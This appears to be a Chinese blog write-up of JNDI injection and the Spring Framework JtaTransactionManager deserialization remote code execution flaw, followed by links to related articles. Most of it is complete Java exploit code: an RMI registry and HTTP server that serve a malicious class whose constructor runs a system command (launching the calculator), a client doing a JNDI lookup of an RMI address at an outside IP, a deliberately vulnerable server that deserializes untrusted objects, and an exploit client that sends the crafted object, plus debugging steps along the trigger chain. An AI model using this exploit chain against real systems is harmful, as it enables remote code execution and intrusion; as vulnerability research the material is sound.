理解这个漏洞需要先看freebuff上的jdni的小例子。

jndi注入在jdk8u121绕过参考这俩篇文章:

https://bl4ck.in/tricks/2019/01/04/JNDI-Injection-Bypass.html

https://www.veracode.com/blog/research/exploiting-jndi-injections-java

server端代码:

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import com.sun.net.httpserver.HttpServer;

import javax.naming.Reference;

import java.io.IOException;

import java.net.InetSocketAddress;

import java.rmi.registry.LocateRegistry;

import java.rmi.registry.Registry;

public class JndiPoc {

    public static void lanuchCodebaseURLServer() throws IOException {

        System.out.println("Starting HTTP server");

        HttpServer httpServer = HttpServer.create(new InetSocketAddress(8009), 0);

        httpServer.createContext("/", new HttpFileHandler());

        httpServer.setExecutor(null);

        httpServer.start();

    }

    public static void lanuchRMIregister(String server_ip) throws Exception {

        System.out.println("Creating RMI Registry");

        Registry registry = LocateRegistry.createRegistry(2222);

        // 设置code url 这里即为http://127.0.0.1:8000/

        // 最终下载恶意类的地址为http://127.0.0.1:8000/ExportObject.class

        String evil_ip="http://"+server_ip+":8009/";

        Reference reference = new Reference("ExportObject", "ExportObject", evil_ip);

        // Reference包装类

        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);

        try {

            registry.bind("aa", referenceWrapper);

           // registry.bind("gsrc_ejbobject",referenceWrapper);

        }catch (Exception e){

            System.out.println("e.getCause().getCause().getCause().getMessage()");

        }

    }

    public static void main(String[] args) throws Exception {

        lanuchCodebaseURLServer();

        lanuchRMIregister("127.0.0.1");

    }

}

client代码:

import javax.naming.*;

public class Jndi_Client {

    public static void main(String[] args) throws Exception {

        String uri="rmi://121.195.170.196:2222/aa";

        Context ctx=new InitialContext();

        ctx.lookup(uri);

    }

}

lookup参数uri可控,将uri注入恶意ip的rmi服务,触发实例化恶意类构造方法调用。

import java.io.BufferedInputStream;

import java.io.BufferedReader;

import java.io.InputStreamReader;

public class ExportObject{

    /*

    public static void main(String args[]) throws Exception {

    }*/

    public ExportObject() throws Exception {

      String OS=  System.getProperty("os.name").toLowerCase();

        String cmd="open /Applications/Calculator.app";

      if(OS.indexOf("win")>=0)

      {

        cmd="calc.exe";

      }

     //String cmd="open /Applications/Calculator.app";

        Runtime.getRuntime().exec(cmd);

    }

}



下面具体看Spring framework 反序列化的漏洞

Server端代码:

imort java.io.*;

import java.net.*;

public class ExploitableServer {

	public static void main(String[] args) {

		try {

		//本地监听1234端口

			ServerSocket serverSocket = new ServerSocket(1234);

			System.out.println("Server started on port "+serverSocket.getLocalPort());

			while(true) {

				Socket socket=serverSocket.accept();

				System.out.println("Connection received from "+socket.getInetAddress());

				ObjectInputStream objectInputStream = new ObjectInputStream(socket.getInputStream());

				try {

				//执行接收到类的readObject方法

					Object object = objectInputStream.readObject();

					System.out.println("Read object "+object);

				} catch(Exception e) {

					System.out.println("Exception caught while reading object");

					e.printStackTrace();

				}

			}

		} catch(Exception e) {

			e.printStackTrace();

		}

	}

}

client端:

import java.io.*;

import java.net.*;

import java.rmi.registry.*;

import com.sun.net.httpserver.*;

import com.sun.jndi.rmi.registry.*;

import javax.naming.*;

public class ExploitClient {

	public static void main(String[] args) {

		try {

			String serverAddress = "127.0.0.1";

			int port = Integer.parseInt("1234");

			String localAddress= "127.0.0.1";

			System.out.println("Starting HTTP server");   //开启80端口服务

			HttpServer httpServer = HttpServer.create(new InetSocketAddress(81), 0);

			httpServer.createContext("/",new HttpFileHandler());

			httpServer.setExecutor(null);

			httpServer.start();

			System.out.println("Creating RMI Registry"); //绑定RMI服务到 1099端口 Object  提供恶意类的RMI服务

            Registry registry = LocateRegistry.createRegistry(1099);

            /*

            java为了将object对象存储在Naming或者Directory服务下,

            提供了Naming Reference功能,对象可以通过绑定Reference存储在Naming和Directory服务下,

            比如(rmi,ldap等)。在使用Reference的时候,我们可以直接把对象写在构造方法中,

            当被调用的时候,对象的方法就会被触发。理解了jndi和jndi reference后,

            就可以理解jndi注入产生的原因了。

             */ //绑定本地的恶意类到1099端口

        	Reference reference = new javax.naming.Reference("ExportObject","ExportObject","http://"+serverAddress+":81"+"/");

			ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(reference);

            registry.bind("Object", referenceWrapper);

			System.out.println("Connecting to server "+serverAddress+":"+port); //连接服务器1234端口

			Socket socket=new Socket(serverAddress,port);

			System.out.println("Connected to server");

			String jndiAddress = "rmi://"+localAddress+":1099/Object";

			//JtaTransactionManager 反序列化时的readObject方法存在问题 //使得setUserTransactionName可控,远程加载恶意类

			//lookup方法会实例化恶意类,导致执行恶意类无参的构造方法

			org.springframework.transaction.jta.JtaTransactionManager object = new org.springframework.transaction.jta.JtaTransactionManager();

			object.setUserTransactionName(jndiAddress);

			//上面就是poc,下面是将object序列化发送给服务器,服务器访问恶意类

			System.out.println("Sending object to server...");

			ObjectOutputStream objectOutputStream = new ObjectOutputStream(socket.getOutputStream());

			objectOutputStream.writeObject(object);

			objectOutputStream.flush();

			while(true) {

				Thread.sleep(1000);

			}

		} catch(Exception e) {

			e.printStackTrace();

		}

	}

}

server与client交互流程:



漏洞触发点:



下断点调试,前面client都是绑定操作,直到执行到43行,将恶意的rmi地址写入:



46行将恶意类发送到Server端,server端执行JtaTransactionManager类的readObject:



跟到616行:



f7跟到173行:



继续f7跟到247行,调用了looup方法:



继续跟进94行,name 传进的值是之前绑定的恶意类的地址,lookup方法会调用恶意类的构造方法。



跟到恶意类构造方法,触发RCE.



参考链接:

https://www.freebuf.com/vuls/115849.html

https://paper.seebug.org/312/

Spring framework 反序列化的漏洞的更多相关文章

  1. Spring框架中文件目录遍历漏洞 Directory traversal in Spring framework

    官方给出的描述是Spring框架中报告了一个与静态资源处理相关的目录遍历漏洞.某些URL在使用前未正确加密,使得攻击者能够获取文件系统上的任何文件,这些文件也可用于运行SpringWeb应用程序的进程 ...

  2. 最新漏洞:Spring Framework远程代码执行漏洞

    Spring Framework远程代码执行漏洞 发布时间 2022-03-31 漏洞等级 High CVE编号 CVE-2022-22965 影响范围:同时满足以下三个条件可确定受此漏洞影响: JD ...

  3. Spring Framework远程代码执行漏洞复现(CVE-2022-22965)

    1.漏洞描述 漏洞名称 Spring Framework远程代码执行漏洞 公开时间 2022-03-29 更新时间 2022-03-31 CVE编号 CVE-2022-22965 其他编号 QVD-2 ...

  4. Spring Framework 远程命令执行漏洞(CVE-2022-22965)

    Spring Framework 远程命令执行漏洞 (CVE-2022-22965) 近日,Spring 官方 GitHub issue中提到了关于 Spring Core 的远程命令执行漏洞,该漏洞 ...

  5. Spring系列(零) Spring Framework 文档中文翻译

    Spring 框架文档(核心篇1和2) Version 5.1.3.RELEASE 最新的, 更新的笔记, 支持的版本和其他主题,独立的发布版本等, 是在Github Wiki 项目维护的. 总览 历 ...

  6. Spring Framework(框架)整体架构 变迁

    Spring Framework(框架)整体架构 2018年04月24日 11:16:41 阅读数:1444 标签: Spring框架架构 更多 个人分类: Spring框架   版权声明:本文为博主 ...

  7. 浅谈对Spring Framework的认识

    Spring Framework,作为一个应用框架,官方的介绍如下: The Spring Framework provides a comprehensive programming and con ...

  8. Hello Spring Framework——依赖注入(DI)与控制翻转(IoC)

    又到年关了,还有几天就是春节.趁最后还有些时间,复习一下Spring的官方文档. 写在前面的话: Spring是我首次开始尝试通过官方文档来学习的框架(以前学习Struts和Hibernate都大多是 ...

  9. 手动创建Spring项目 Spring framework

    之前学习框架一直是看的视频教程,并且在都配套有项目源码,跟着视频敲代码总是很简单,现在想深入了解,自己从官网下载文件手动搭建,就遇到了很多问题记载如下. 首先熟悉一下spring的官方网站:http: ...

随机推荐

  1. Timer控件

    Timer控件是定期引发事件的控件,时间间隔的长度由interval属性定义,其值以毫秒为单位吗,若启用了该组件,则每个事件间隔引发一个Tick事件,Timer组件的主要方法包括start和stop, ...

  2. Spring 学习(四)--- AOP

    问题 : AOP 解决的问题是什么 Spring AOP 的底层实现是什么 Spring AOP 和 AspectJ 的区别是什么 概述 在软件业,AOP为Aspect Oriented Progra ...

  3. mongodb在w10安装及配置

    官网网站下载mongodb 第一步:安装 默认安装一直next,直到choose setup type,系统盘空间足够大,安装在c盘就好 第二步:配置及使用 1.创建目录mongodb,及三个文件夹d ...

  4. 字符串匹配问题(lfyzoj)

    问题描述 字符串中只含有括号 (),[],<>,{},判断输入的字符串中括号是否匹配.如果括号有互相包含的形式,从内到外必须是<>,(),[],{},例如.输入: [()] 输 ...

  5. Jquery Easy UI初步学习(一)

    Easy UI 1.3.2 以前听说Easy UI很不错,当了一个dome,闲着没事就看了一下,也整理一下为了自己更好的记忆,也希望对象我这样小菜有帮助吧 先从后台管理的主页面开始,如要要做主页需要了 ...

  6. Java学习--扑克牌比大小的小游戏

    实现:生成五十四张牌,然后进行洗牌,输入两名玩家,然后分别发两张牌,进行比较大小,两张牌中拥有较大一张牌的玩家获胜 Card.java代码如下: package com.cardgame; publi ...

  7. 三:SpringCloud-Ribbon

    六:Ribbon负载均衡 1. 概述 1.1 是什么 Spring Cloud Ribbon是基于Netflix Ribbon实现的一套==客户端 负载均衡==的工具. 简单的说,Ribbon是Net ...

  8. spss C# 二次开发 学习笔记(二)——Spss以及统计术语解释(IT人眼中的统计术语)

    针对客户需求,需要对一些数据做统计分析.统计分析的第一步,即为数据查询,查找出要统计分析的数据. 查询得出的是一个行列表格的结果集,行.列.表格等这些IT的数据库概念和Spss以及统计中的术语是如何对 ...

  9. Hibernate入门(四)—— 查询

    一.Hibernate查询 1.Hibernate检索(查询)方式的分类 OID检索 :根据主键查询,get/load 对象导航检索 :通过一个对象获得其关联对象.[重点] Category cate ...

  10. laravel开发之-安装laravel-admin

    1.输入命令:composer require encore/laravel-admin "1.4.*" 2.在config/app.php中添加 :Encore\Admin\Pr ...